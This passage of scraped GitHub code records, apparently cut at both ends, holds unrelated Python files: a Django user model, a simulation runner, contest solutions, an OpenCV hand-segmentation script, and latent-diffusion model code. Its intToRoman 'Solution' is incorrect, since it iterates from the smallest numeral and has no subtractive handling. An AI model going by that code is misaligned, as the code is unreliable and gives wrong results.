= True\n user.save()\n return user\n\n\nclass UserProfile(AbstractBaseUser, PermissionsMixin):\n GENDER_MALE = 0\n GENDER_FEMALE = 1\n GENDER_DIVERSE = 2\n GENDER_OPTIONS = (\n (GENDER_MALE, \"male\"),\n (GENDER_FEMALE, \"female\"),\n (GENDER_DIVERSE, \"diverse\"),\n )\n\n FOOD_OMNIVOUROUS = 0\n FOOD_VEGETARIAN = 1\n FOOD_OPTIONS = ((FOOD_OMNIVOUROUS, \"omnivourous\"), (FOOD_VEGETARIAN, \"vegetarian\"))\n\n email = EmailField(unique=True, verbose_name=\"Email address\")\n is_active = BooleanField(default=True)\n is_staff = BooleanField(default=False)\n gender = SmallIntegerField(choices=GENDER_OPTIONS)\n food_preference = SmallIntegerField(choices=FOOD_OPTIONS)\n first_name = CharField(max_length=254, verbose_name=\"First name\")\n last_name = CharField(max_length=254, verbose_name=\"Last name\")\n birth_date = DateField()\n phone = IntegerField()\n address_line_1 = CharField(max_length=254)\n address_line_2 = CharField(max_length=254, blank=True, null=True)\n zip = CharField(max_length=254)\n city = CharField(max_length=254)\n state = CharField(max_length=254)\n\n USERNAME_FIELD = \"email\"\n REQUIRED_FIELDS = [\n \"gender\",\n \"food_preference\",\n \"first_name\",\n \"last_name\",\n \"birth_date\",\n \"phone\",\n \"address_line_1\",\n \"zip\",\n \"city\",\n \"state\",\n ]\n\n objects = UserManager()\n\n def get_full_name(self):\n return self.first_name + \" \" + self.last_name\n\n def get_short_name(self):\n return 
self.first_name\n","repo_name":"DMUN-e-V/munkey","sub_path":"user_management/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"10391299169","text":"import pandas as pd\nfrom tqdm import tqdm\nimport numpy as np\nimport jax.random as random\nimport os\nimport time\n\nimport compute_pmass as pm\n\n# \"fixed_ratio\", \"fixed_alts\", \"fixed_choosers\"\nMODE = \"fixed_ratio\"\nVERBOSE = True\nDEBUG = True\n\nALTS_SIZES = [\n 200,\n # 2000,\n # 20000,\n # 200000,\n # 2000000\n]\n\nCHOOSER_SIZES = [\n # 750,\n # 7500,\n # 75000,\n # 750000,\n 7500000\n]\n\n\nALTS_TO_ITERS = {200: 10, 2000: 10, 20000: 10, 200000: 10, 2000000: 10}\nPOP_TO_ALTS_RATIO = 750 / 200\nSCALE_PARAMS = [.25, .5, .75, 1, 1.25, 1.5, 1.75]\nSAMPLE_RATES = [.1, .2, .3, .4, .5, .6, .7, .8, .9, 1]\nCOEFFS = np.array([-1, 1, 1, 1, 1]) # dist-to-cbd, sizes 1-3, intx term\nOUTFILE = '../data/disp_err_scale_iters_importance.csv'\n\n\ndef run(mode=MODE):\n key = random.PRNGKey(0)\n if os.path.exists(OUTFILE):\n df = pd.read_csv(OUTFILE)\n else:\n df = pd.DataFrame()\n for num_choosers in CHOOSER_SIZES:\n if MODE == 'fixed_ratio':\n ALTS_SIZES = [int(num_choosers) * (2.0 / 7.5)]\n for num_alts in ALTS_SIZES:\n\n run_id = df['run_id'].max() + 1 if len(df) > 0 else 1\n\n num_iters = ALTS_TO_ITERS[num_alts]\n print(\"RUNNING {0} ITERATIONS WITH {1} ALTS and {2} CHOOSERS\".format(\n num_iters, num_alts, num_choosers))\n\n for i in tqdm(range(num_iters)):\n \n iter_df = pd.DataFrame()\n disable = (max(num_alts, num_choosers) < 200000) and (VERBOSE is False)\n for scale_param in tqdm(SCALE_PARAMS, disable=disable):\n sttm = time.time()\n scale_df = pm.run_v2(\n num_alts, num_choosers, SAMPLE_RATES, COEFFS, key,\n batched=True, scale=scale_param, debug=DEBUG, verbose=VERBOSE)\n endtm = time.time()\n scale_df['scale'] = scale_param\n scale_df['runtime'] = endtm - sttm\n iter_df = pd.concat((iter_df, scale_df), ignore_index=True)\n iter_df['run_id'] = run_id\n iter_df['num_alts'] = num_alts\n iter_df['num_choosers'] = num_choosers\n df = pd.concat((df, iter_df), ignore_index=True)\n df.to_csv(OUTFILE, index=False)\n run_id += 1\n\n df = df.replace(np.inf, np.nan)\n\n return df\n\n\nif __name__ == '__main__':\n\n df = run()\n","repo_name":"mxndrwgrdnr/simulation_bias","sub_path":"scripts/compute_disp_err.py","file_name":"compute_disp_err.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21495538596","text":"from sys import stdin\r\nfrom itertools import permutations\r\n\r\na, b = stdin.readline().rstrip().split()\r\nb = int(b)\r\na_arr = []\r\nc = -1\r\n\r\nfor i in permutations(a):\r\n a_arr.append(''.join(i))\r\n\r\nfor i in a_arr:\r\n if i[0] == '0':\r\n continue\r\n i = int(i)\r\n if i < b:\r\n c = max(c, i)\r\n\r\nprint(c)","repo_name":"youngeun10/baekjoon","sub_path":"백준/Silver/16943. 
숫자 재배치/숫자 재배치.py","file_name":"숫자 재배치.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"4443738827","text":"class Solution:\n def intToRoman(self, num: int) -> str:\n roman = {\"I\": 1, \"V\": 5, \"X\": 10,\"L\": 50,\"C\":100,\"D\": 500,\"M\":1000}\n result = ''\n for key, value in roman.items():\n x, y = divmod(num, value)\n result += key * x\n num = y\n\n return result","repo_name":"Kodirova/LeetCodeSolutions","sub_path":"intToRoman.py","file_name":"intToRoman.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23035620088","text":"import cv2\nimport numpy as np\nimport imutils\n\n# globals\nbg = None\n\n\ndef run_avg(image, aWeight):\n \"\"\"\n Calculate running average between the background model and current frame.\n :param image:\n :param aWeight:\n :return:\n \"\"\"\n\n global bg\n # if there is no bg (because it's currently the first frame)\n # then initialize it with the current frame\n if bg is None:\n bg = image.copy().astype(\"float\")\n return\n\n cv2.accumulateWeighted(image, bg, aWeight)\n\n\ndef segment(image, threshold=25):\n global bg\n diff = cv2.absdiff(bg.astype('uint8'), image)\n\n # threshold the diff'd image and get the contours of only hands\n thresholded = cv2.threshold(diff, threshold, 255, cv2.THRESH_BINARY)[1]\n cnts, _ = cv2.findContours(thresholded.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n # if no contours detected return\n if len(cnts) == 0:\n return\n else:\n segmented = max(cnts, key=cv2.contourArea)\n return thresholded, segmented\n\n\nif __name__ == '__main__':\n # running average weight\n aWeight = 0.5\n # webcam reference\n camera = cv2.VideoCapture(0)\n # region of interest\n top, right, bottom, left = 10, 350, 225, 590\n # initialize num_frames\n num_frames = 0\n\n while True:\n # get current frame and resize and flip so it's not mirrored\n (grabbed, frame) = camera.read()\n frame = imutils.resize(frame, width=700)\n frame = cv2.flip(frame, 1)\n\n clone = frame.copy()\n (height, width) = frame.shape[:2]\n roi = frame[top:bottom, right:left]\n\n # convert region of interest to grayscale and blur\n gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (7, 7), 0)\n\n # calibrate background until threshold reached\n if num_frames < 30:\n run_avg(gray, aWeight)\n else:\n # segment the hand region and then check\n hand = segment(gray)\n if hand is not None:\n # if it exists, unpack the thresholded image, draw, and display\n (thresholded, segmented) = hand\n cv2.drawContours(clone, [segmented + (right, top)], -1, (0, 0, 255))\n cv2.imshow('Thresholded', thresholded)\n\n # draw segmented hand, increment frames and display\n cv2.rectangle(clone, (left, top), (right, bottom), (0, 255, 0), 2)\n num_frames += 1\n cv2.imshow(\"Video Feed\", clone)\n\n # wait for keypress to signal interrupt; \"q\" to stop loop\n keypress = cv2.waitKey(1) & 0xFF\n if keypress == ord('q'):\n break\n\n # free memory\n camera.release()\n cv2.destroyAllWindows()\n","repo_name":"sydneyq/Count-Recognition","sub_path":"segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1145761167","text":"import json\nimport matplotlib.pyplot as plt\n\nfrom collections import defaultdict\nfrom formulae import *\nfrom random 
import random\nfrom typing import List, Tuple\n\nfrom result import Result, Series\n\n\ndef main():\n rock_types, data = read_data()\n\n res = {}\n\n pore_size_range = (1, 100)\n salinity_range = (0.5, 3.5)\n\n for source in data:\n rt = source[\"rock_type\"]\n \n if rt not in res:\n res[rt] = Series(rt)\n\n for _ in range(100):\n pore_size = round((pore_size_range[1] - pore_size_range[0]) * random() + pore_size_range[0]) / 10**9\n salinity = round((salinity_range[1] - salinity_range[0]) * random(), 2) + salinity_range[0]\n res[rt].run(source[\"data\"], pore_size, salinity)\n\n for _, series in res.items():\n series.plot()\n\n\ndef read_data():\n with open(\"rock_types.json\") as rf:\n rock_types = json.load(rf)\n with open(\"data.json\") as df:\n data = json.load(df)\n\n return rock_types, data\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Vesafary/hydrogen-store","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74265790240","text":"def extract_route(s):\n s = s.upper().split()\n Blocks = ['И-', 'Э-', 'Р-', \"ГУК-\", \"Т-\", \"ВХО\",\"ВЫХОД\"]\n Result = []\n for symbol in Blocks:\n for i in s:\n if i.count(symbol) == 1:\n i = i.replace('А', \"1\")\n i = i.replace('Б', \"2\")\n if i.count(\"ВХО\") == 1:\n Result.append(\"Р-0000\")\n elif i.count(\"ВЫХОД\") == 1:\n Result.append(\"Р-0000\")\n else:\n Result.append(i)\n\n print(Result)\n return Result\n\n\ndef fixer(i):\n\n i = i.upper()\n i = i.replace('А', \"1\")\n i = i.replace('Б', \"2\")\n i = i.replace('ВХОД', \"Р-0000\")\n i = i.replace('ВЫХОД', \"Р-0000\")\n print(i)\n return i\n","repo_name":"Molochko1990/UniversityNavigator","sub_path":"recognition.py","file_name":"recognition.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24458799493","text":"from functools import partial\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom einops import rearrange\nfrom tqdm import tqdm\n\nfrom .unet import UNetModel\nfrom .utils import (DiagonalGaussianDistribution, default, exists, mean_flat,\n normal_kl)\n\n\ndef extract_into_tensor(a, t, x_shape):\n b, *_ = t.shape\n out = a.gather(-1, t)\n return out.reshape(b, *((1,) * (len(x_shape) - 1)))\n\n\ndef noise_like(shape, device, repeat=False):\n repeat_noise = lambda: torch.randn((1, *shape[1:]), device=device).repeat(\n shape[0], *((1,) * (len(shape) - 1))\n )\n noise = lambda: torch.randn(shape, device=device)\n return repeat_noise() if repeat else noise()\n\n\ndef make_beta_schedule(\n schedule, n_timestep, linear_start=1e-4, linear_end=2e-2, cosine_s=8e-3\n):\n if schedule == \"linear\":\n betas = (\n torch.linspace(\n linear_start**0.5, linear_end**0.5, n_timestep, dtype=torch.float64\n )\n ** 2\n )\n\n elif schedule == \"cosine\":\n timesteps = (\n torch.arange(n_timestep + 1, dtype=torch.float64) / n_timestep + cosine_s\n )\n alphas = timesteps / (1 + cosine_s) * np.pi / 2\n alphas = torch.cos(alphas).pow(2)\n alphas = alphas / alphas[0]\n betas = 1 - alphas[1:] / alphas[:-1]\n betas = np.clip(betas, a_min=0, a_max=0.999)\n\n elif schedule == \"sqrt_linear\":\n betas = torch.linspace(\n linear_start, linear_end, n_timestep, dtype=torch.float64\n )\n elif schedule == \"sqrt\":\n betas = (\n torch.linspace(linear_start, linear_end, n_timestep, dtype=torch.float64)\n ** 0.5\n )\n else:\n raise ValueError(f\"schedule 
'{schedule}' unknown.\")\n return betas.numpy()\n\n\ndef make_ddim_timesteps(ddim_discr_method, num_ddim_timesteps, num_ddpm_timesteps):\n if ddim_discr_method == \"uniform\":\n c = num_ddpm_timesteps // num_ddim_timesteps\n ddim_timesteps = np.asarray(list(range(0, num_ddpm_timesteps, c)))\n elif ddim_discr_method == \"quad\":\n ddim_timesteps = (\n (np.linspace(0, np.sqrt(num_ddpm_timesteps * 0.8), num_ddim_timesteps)) ** 2\n ).astype(int)\n else:\n raise NotImplementedError(\n f'There is no ddim discretization method called \"{ddim_discr_method}\"'\n )\n\n # assert ddim_timesteps.shape[0] == num_ddim_timesteps\n # add one to get the final alpha values right (the ones from first scale to data during sampling)\n steps_out = ddim_timesteps + 1\n return steps_out\n\n\ndef make_ddim_sampling_parameters(alphacums, ddim_timesteps, eta):\n alphas = alphacums[ddim_timesteps]\n alphas_prev = np.asarray([alphacums[0]] + alphacums[ddim_timesteps[:-1]].tolist())\n\n sigmas = eta * np.sqrt(\n (1 - alphas_prev) / (1 - alphas) * (1 - alphas / alphas_prev)\n )\n return sigmas, alphas, alphas_prev\n\n\nclass DDPM(nn.Module):\n def __init__(\n self,\n timesteps=1000,\n beta_schedule=\"linear\",\n loss_type=\"l2\",\n ckpt_path=None,\n ignore_keys=[],\n load_only_unet=False,\n first_stage_key=\"image\",\n image_size=256,\n channels=3,\n log_every_t=100,\n clip_denoised=True,\n linear_start=1e-4,\n linear_end=2e-2,\n cosine_s=8e-3,\n given_betas=None,\n original_elbo_weight=0.0,\n v_posterior=0.0, # weight for choosing posterior variance as sigma = (1-v) * beta_tilde + v * beta\n l_simple_weight=1.0,\n parameterization=\"eps\", # all assuming fixed variance schedules\n scheduler_config=None,\n use_positional_encodings=False,\n learn_logvar=False,\n logvar_init=0.0,\n ):\n super().__init__()\n assert parameterization in [\n \"eps\",\n \"x0\",\n ], 'currently only supporting \"eps\" and \"x0\"'\n self.parameterization = parameterization\n print(\n f\"{self.__class__.__name__}: Running in {self.parameterization}-prediction mode\"\n )\n self.cond_stage_model = None\n self.clip_denoised = clip_denoised\n self.log_every_t = log_every_t\n self.first_stage_key = first_stage_key\n self.image_size = image_size # try conv?\n self.channels = channels\n self.use_positional_encodings = use_positional_encodings\n self.model = DiffusionWrapper()\n\n self.use_scheduler = scheduler_config is not None\n if self.use_scheduler:\n self.scheduler_config = scheduler_config\n\n self.v_posterior = v_posterior\n self.original_elbo_weight = original_elbo_weight\n self.l_simple_weight = l_simple_weight\n\n if ckpt_path is not None:\n self.init_from_ckpt(\n ckpt_path, ignore_keys=ignore_keys, only_model=load_only_unet\n )\n\n self.register_schedule(\n given_betas=given_betas,\n beta_schedule=beta_schedule,\n timesteps=timesteps,\n linear_start=linear_start,\n linear_end=linear_end,\n cosine_s=cosine_s,\n )\n\n self.loss_type = loss_type\n\n self.learn_logvar = learn_logvar\n self.logvar = torch.full(fill_value=logvar_init, size=(self.num_timesteps,))\n if self.learn_logvar:\n self.logvar = nn.Parameter(self.logvar, requires_grad=True)\n\n def register_schedule(\n self,\n given_betas=None,\n beta_schedule=\"linear\",\n timesteps=1000,\n linear_start=1e-4,\n linear_end=2e-2,\n cosine_s=8e-3,\n ):\n if exists(given_betas):\n betas = given_betas\n else:\n betas = make_beta_schedule(\n beta_schedule,\n timesteps,\n linear_start=linear_start,\n linear_end=linear_end,\n cosine_s=cosine_s,\n )\n alphas = 1.0 - betas\n alphas_cumprod = 
np.cumprod(alphas, axis=0)\n alphas_cumprod_prev = np.append(1.0, alphas_cumprod[:-1])\n\n (timesteps,) = betas.shape\n self.num_timesteps = int(timesteps)\n self.linear_start = linear_start\n self.linear_end = linear_end\n assert (\n alphas_cumprod.shape[0] == self.num_timesteps\n ), \"alphas have to be defined for each timestep\"\n\n to_torch = partial(torch.tensor, dtype=torch.float32)\n\n self.register_buffer(\"betas\", to_torch(betas))\n self.register_buffer(\"alphas_cumprod\", to_torch(alphas_cumprod))\n self.register_buffer(\"alphas_cumprod_prev\", to_torch(alphas_cumprod_prev))\n\n # calculations for diffusion q(x_t | x_{t-1}) and others\n self.register_buffer(\"sqrt_alphas_cumprod\", to_torch(np.sqrt(alphas_cumprod)))\n self.register_buffer(\n \"sqrt_one_minus_alphas_cumprod\", to_torch(np.sqrt(1.0 - alphas_cumprod))\n )\n self.register_buffer(\n \"log_one_minus_alphas_cumprod\", to_torch(np.log(1.0 - alphas_cumprod))\n )\n self.register_buffer(\n \"sqrt_recip_alphas_cumprod\", to_torch(np.sqrt(1.0 / alphas_cumprod))\n )\n self.register_buffer(\n \"sqrt_recipm1_alphas_cumprod\", to_torch(np.sqrt(1.0 / alphas_cumprod - 1))\n )\n\n # calculations for posterior q(x_{t-1} | x_t, x_0)\n posterior_variance = (1 - self.v_posterior) * betas * (\n 1.0 - alphas_cumprod_prev\n ) / (1.0 - alphas_cumprod) + self.v_posterior * betas\n # above: equal to 1. / (1. / (1. - alpha_cumprod_tm1) + alpha_t / beta_t)\n self.register_buffer(\"posterior_variance\", to_torch(posterior_variance))\n # below: log calculation clipped because the posterior variance is 0 at the beginning of the diffusion chain\n self.register_buffer(\n \"posterior_log_variance_clipped\",\n to_torch(np.log(np.maximum(posterior_variance, 1e-20))),\n )\n self.register_buffer(\n \"posterior_mean_coef1\",\n to_torch(betas * np.sqrt(alphas_cumprod_prev) / (1.0 - alphas_cumprod)),\n )\n self.register_buffer(\n \"posterior_mean_coef2\",\n to_torch(\n (1.0 - alphas_cumprod_prev) * np.sqrt(alphas) / (1.0 - alphas_cumprod)\n ),\n )\n\n if self.parameterization == \"eps\":\n lvlb_weights = self.betas**2 / (\n 2\n * self.posterior_variance\n * to_torch(alphas)\n * (1 - self.alphas_cumprod)\n )\n elif self.parameterization == \"x0\":\n lvlb_weights = (\n 0.5\n * np.sqrt(torch.Tensor(alphas_cumprod))\n / (2.0 * 1 - torch.Tensor(alphas_cumprod))\n )\n else:\n raise NotImplementedError(\"mu not supported\")\n # TODO how to choose this term\n lvlb_weights[0] = lvlb_weights[1]\n self.register_buffer(\"lvlb_weights\", lvlb_weights, persistent=False)\n assert not torch.isnan(self.lvlb_weights).all()\n\n def init_from_ckpt(self, path, ignore_keys=list(), only_model=False):\n sd = torch.load(path, map_location=\"cpu\")\n if \"state_dict\" in list(sd.keys()):\n sd = sd[\"state_dict\"]\n keys = list(sd.keys())\n for k in keys:\n for ik in ignore_keys:\n if k.startswith(ik):\n print(\"Deleting key {} from state_dict.\".format(k))\n del sd[k]\n missing, unexpected = (\n self.load_state_dict(sd, strict=False)\n if not only_model\n else self.model.load_state_dict(sd, strict=False)\n )\n\n def q_mean_variance(self, x_start, t):\n \"\"\"\n Get the distribution q(x_t | x_0).\n :param x_start: the [N x C x ...] tensor of noiseless inputs.\n :param t: the number of diffusion steps (minus 1). 
Here, 0 means one step.\n :return: A tuple (mean, variance, log_variance), all of x_start's shape.\n \"\"\"\n mean = extract_into_tensor(self.sqrt_alphas_cumprod, t, x_start.shape) * x_start\n variance = extract_into_tensor(1.0 - self.alphas_cumprod, t, x_start.shape)\n log_variance = extract_into_tensor(\n self.log_one_minus_alphas_cumprod, t, x_start.shape\n )\n return mean, variance, log_variance\n\n def predict_start_from_noise(self, x_t, t, noise):\n return (\n extract_into_tensor(self.sqrt_recip_alphas_cumprod, t, x_t.shape) * x_t\n - extract_into_tensor(self.sqrt_recipm1_alphas_cumprod, t, x_t.shape)\n * noise\n )\n\n def q_posterior(self, x_start, x_t, t):\n posterior_mean = (\n extract_into_tensor(self.posterior_mean_coef1, t, x_t.shape) * x_start\n + extract_into_tensor(self.posterior_mean_coef2, t, x_t.shape) * x_t\n )\n posterior_variance = extract_into_tensor(self.posterior_variance, t, x_t.shape)\n posterior_log_variance_clipped = extract_into_tensor(\n self.posterior_log_variance_clipped, t, x_t.shape\n )\n return posterior_mean, posterior_variance, posterior_log_variance_clipped\n\n def p_mean_variance(self, x, t, clip_denoised: bool):\n model_out = self.model(x, t)\n if self.parameterization == \"eps\":\n x_recon = self.predict_start_from_noise(x, t=t, noise=model_out)\n elif self.parameterization == \"x0\":\n x_recon = model_out\n if clip_denoised:\n x_recon.clamp_(-1.0, 1.0)\n\n model_mean, posterior_variance, posterior_log_variance = self.q_posterior(\n x_start=x_recon, x_t=x, t=t\n )\n return model_mean, posterior_variance, posterior_log_variance\n\n @torch.no_grad()\n def p_sample(self, x, t, clip_denoised=True, repeat_noise=False):\n b, *_, device = *x.shape, x.device\n model_mean, _, model_log_variance = self.p_mean_variance(\n x=x, t=t, clip_denoised=clip_denoised\n )\n noise = noise_like(x.shape, device, repeat_noise)\n # no noise when t == 0\n nonzero_mask = (1 - (t == 0).float()).reshape(b, *((1,) * (len(x.shape) - 1)))\n return model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise\n\n @torch.no_grad()\n def p_sample_loop(self, shape, return_intermediates=False):\n device = self.betas.device\n b = shape[0]\n img = torch.randn(shape, device=device)\n intermediates = [img]\n for i in tqdm(\n reversed(range(0, self.num_timesteps)),\n desc=\"Sampling t\",\n total=self.num_timesteps,\n ):\n img = self.p_sample(\n img,\n torch.full((b,), i, device=device, dtype=torch.long),\n clip_denoised=self.clip_denoised,\n )\n if i % self.log_every_t == 0 or i == self.num_timesteps - 1:\n intermediates.append(img)\n if return_intermediates:\n return img, intermediates\n return img\n\n @torch.no_grad()\n def sample(self, batch_size=16, return_intermediates=False):\n image_size = self.image_size\n channels = self.channels\n return self.p_sample_loop(\n (batch_size, channels, image_size, image_size),\n return_intermediates=return_intermediates,\n )\n\n def q_sample(self, x_start, t, noise=None):\n noise = default(noise, lambda: torch.randn_like(x_start))\n return (\n extract_into_tensor(self.sqrt_alphas_cumprod, t, x_start.shape) * x_start\n + extract_into_tensor(self.sqrt_one_minus_alphas_cumprod, t, x_start.shape)\n * noise\n )\n\n def get_loss(self, pred, target, mean=True):\n if self.loss_type == \"l1\":\n loss = (target - pred).abs()\n if mean:\n loss = loss.mean()\n elif self.loss_type == \"l2\":\n if mean:\n loss = torch.nn.functional.mse_loss(target, pred)\n else:\n loss = torch.nn.functional.mse_loss(target, pred, reduction=\"none\")\n else:\n raise 
NotImplementedError(\"unknown loss type '{loss_type}'\")\n\n return loss\n\n def p_losses(self, x_start, t, noise=None):\n noise = default(noise, lambda: torch.randn_like(x_start))\n x_noisy = self.q_sample(x_start=x_start, t=t, noise=noise)\n model_out = self.model(x_noisy, t)\n\n loss_dict = {}\n if self.parameterization == \"eps\":\n target = noise\n elif self.parameterization == \"x0\":\n target = x_start\n else:\n raise NotImplementedError(\n f\"Paramterization {self.parameterization} not yet supported\"\n )\n\n loss = self.get_loss(model_out, target, mean=False).mean(dim=[1, 2, 3])\n\n log_prefix = \"train\" if self.training else \"val\"\n\n loss_dict.update({f\"{log_prefix}/loss_simple\": loss.mean()})\n loss_simple = loss.mean() * self.l_simple_weight\n\n loss_vlb = (self.lvlb_weights[t] * loss).mean()\n loss_dict.update({f\"{log_prefix}/loss_vlb\": loss_vlb})\n\n loss = loss_simple + self.original_elbo_weight * loss_vlb\n\n loss_dict.update({f\"{log_prefix}/loss\": loss})\n\n return loss, loss_dict\n\n def forward(self, x, *args, **kwargs):\n # b, c, h, w, device, img_size, = *x.shape, x.device, self.image_size\n # assert h == img_size and w == img_size, f'height and width of image must be {img_size}'\n t = torch.randint(\n 0, self.num_timesteps, (x.shape[0],), device=self.device\n ).long()\n return self.p_losses(x, t, *args, **kwargs)\n\n def get_input(self, batch, k):\n x = batch[k]\n if len(x.shape) == 3:\n x = x[..., None]\n x = rearrange(x, \"b h w c -> b c h w\")\n x = x.to(memory_format=torch.contiguous_format).float()\n return x\n\n\nclass LatentDiffusion(DDPM):\n \"\"\"main class\"\"\"\n\n def __init__(\n self,\n autoencoder,\n clipembedder,\n num_timesteps_cond=None,\n cond_stage_key=\"image\",\n cond_stage_trainable=False,\n concat_mode=True,\n cond_stage_forward=None,\n scale_factor=1.0,\n scale_by_std=False,\n device: str = \"cuda\",\n **kwargs,\n ):\n self.num_timesteps_cond = default(num_timesteps_cond, 1)\n self.scale_by_std = scale_by_std\n ckpt_path = kwargs.pop(\"ckpt_path\", None)\n ignore_keys = kwargs.pop(\"ignore_keys\", [])\n super().__init__(**kwargs)\n self.concat_mode = concat_mode\n self.cond_stage_trainable = cond_stage_trainable\n self.cond_stage_key = cond_stage_key\n self.first_stage_model = autoencoder\n self.cond_stage_model = clipembedder\n self.device = device\n if not scale_by_std:\n self.scale_factor = scale_factor\n else:\n self.register_buffer(\"scale_factor\", torch.tensor(scale_factor))\n self.cond_stage_forward = cond_stage_forward\n self.clip_denoised = False\n self.bbox_tokenizer = None\n\n self.restarted_from_ckpt = False\n if ckpt_path is not None:\n self.init_from_ckpt(ckpt_path, ignore_keys)\n self.restarted_from_ckpt = True\n\n def make_cond_schedule(\n self,\n ):\n self.cond_ids = torch.full(\n size=(self.num_timesteps,),\n fill_value=self.num_timesteps - 1,\n dtype=torch.long,\n )\n ids = torch.round(\n torch.linspace(0, self.num_timesteps - 1, self.num_timesteps_cond)\n ).long()\n self.cond_ids[: self.num_timesteps_cond] = ids\n\n def register_schedule(\n self,\n given_betas=None,\n beta_schedule=\"linear\",\n timesteps=1000,\n linear_start=1e-4,\n linear_end=2e-2,\n cosine_s=8e-3,\n ):\n super().register_schedule(\n given_betas, beta_schedule, timesteps, linear_start, linear_end, cosine_s\n )\n\n self.shorten_cond_schedule = self.num_timesteps_cond > 1\n if self.shorten_cond_schedule:\n self.make_cond_schedule()\n\n def get_first_stage_encoding(self, encoder_posterior):\n if isinstance(encoder_posterior, 
DiagonalGaussianDistribution):\n z = encoder_posterior.sample()\n elif isinstance(encoder_posterior, torch.Tensor):\n z = encoder_posterior\n else:\n raise NotImplementedError(\n f\"encoder_posterior of type '{type(encoder_posterior)}' not yet implemented\"\n )\n return self.scale_factor * z\n\n def get_learned_conditioning(self, c):\n if self.cond_stage_forward is None:\n if hasattr(self.cond_stage_model, \"encode\") and callable(\n self.cond_stage_model.encode\n ):\n c = self.cond_stage_model.encode(c)\n if isinstance(c, DiagonalGaussianDistribution):\n c = c.mode()\n else:\n c = self.cond_stage_model(c)\n else:\n assert hasattr(self.cond_stage_model, self.cond_stage_forward)\n c = getattr(self.cond_stage_model, self.cond_stage_forward)(c)\n return c\n\n def meshgrid(self, h, w):\n y = torch.arange(0, h).view(h, 1, 1).repeat(1, w, 1)\n x = torch.arange(0, w).view(1, w, 1).repeat(h, 1, 1)\n\n arr = torch.cat([y, x], dim=-1)\n return arr\n\n def delta_border(self, h, w):\n \"\"\"\n :param h: height\n :param w: width\n :return: normalized distance to image border,\n wtith min distance = 0 at border and max dist = 0.5 at image center\n \"\"\"\n lower_right_corner = torch.tensor([h - 1, w - 1]).view(1, 1, 2)\n arr = self.meshgrid(h, w) / lower_right_corner\n dist_left_up = torch.min(arr, dim=-1, keepdims=True)[0]\n dist_right_down = torch.min(1 - arr, dim=-1, keepdims=True)[0]\n edge_dist = torch.min(\n torch.cat([dist_left_up, dist_right_down], dim=-1), dim=-1\n )[0]\n return edge_dist\n\n @torch.no_grad()\n def decode_first_stage(self, z, predict_cids=False, force_not_quantize=False):\n if predict_cids:\n if z.dim() == 4:\n z = torch.argmax(z.exp(), dim=1).long()\n z = self.first_stage_model.quantize.get_codebook_entry(z, shape=None)\n z = rearrange(z, \"b h w c -> b c h w\").contiguous()\n\n z = 1.0 / self.scale_factor * z\n\n if hasattr(self, \"split_input_params\"):\n if self.split_input_params[\"patch_distributed_vq\"]:\n ks = self.split_input_params[\"ks\"] # eg. (128, 128)\n stride = self.split_input_params[\"stride\"] # eg. (64, 64)\n uf = self.split_input_params[\"vqf\"]\n bs, nc, h, w = z.shape\n if ks[0] > h or ks[1] > w:\n ks = (min(ks[0], h), min(ks[1], w))\n print(\"reducing Kernel\")\n\n if stride[0] > h or stride[1] > w:\n stride = (min(stride[0], h), min(stride[1], w))\n print(\"reducing stride\")\n\n fold, unfold, normalization, weighting = self.get_fold_unfold(\n z, ks, stride, uf=uf\n )\n\n z = unfold(z) # (bn, nc * prod(**ks), L)\n\n # 1. Reshape to img shape\n z = z.view(\n (z.shape[0], -1, ks[0], ks[1], z.shape[-1])\n ) # (bn, nc, ks[0], ks[1], L )\n\n # 2. apply model loop over last dim\n output_list = [\n self.first_stage_model.decode(z[:, :, :, :, i])\n for i in range(z.shape[-1])\n ]\n\n o = torch.stack(output_list, axis=-1) # # (bn, nc, ks[0], ks[1], L)\n o = o * weighting\n # Reverse 1. 
reshape to img shape\n o = o.view((o.shape[0], -1, o.shape[-1])) # (bn, nc * ks[0] * ks[1], L)\n # stitch crops together\n decoded = fold(o)\n decoded = decoded / normalization # norm is shape (1, 1, h, w)\n return decoded\n else:\n return self.first_stage_model.decode(z)\n\n else:\n return self.first_stage_model.decode(z)\n\n # same as above but without decorator\n def differentiable_decode_first_stage(\n self, z, predict_cids=False, force_not_quantize=False\n ):\n if predict_cids:\n if z.dim() == 4:\n z = torch.argmax(z.exp(), dim=1).long()\n z = self.first_stage_model.quantize.get_codebook_entry(z, shape=None)\n z = rearrange(z, \"b h w c -> b c h w\").contiguous()\n\n z = 1.0 / self.scale_factor * z\n\n return self.first_stage_model.decode(z)\n\n @torch.no_grad()\n def encode_first_stage(self, x):\n return self.first_stage_model.encode(x)\n\n def shared_step(self, batch, **kwargs):\n x, c = self.get_input(batch, self.first_stage_key)\n loss = self(x, c)\n return loss\n\n def forward(self, x, c, *args, **kwargs):\n t = torch.randint(\n 0, self.num_timesteps, (x.shape[0],), device=self.device\n ).long()\n assert c is not None\n if self.cond_stage_trainable:\n c = self.get_learned_conditioning(c)\n if self.shorten_cond_schedule: # TODO: drop this option\n tc = self.cond_ids[t].to(self.device)\n c = self.q_sample(x_start=c, t=tc, noise=torch.randn_like(c.float()))\n\n return 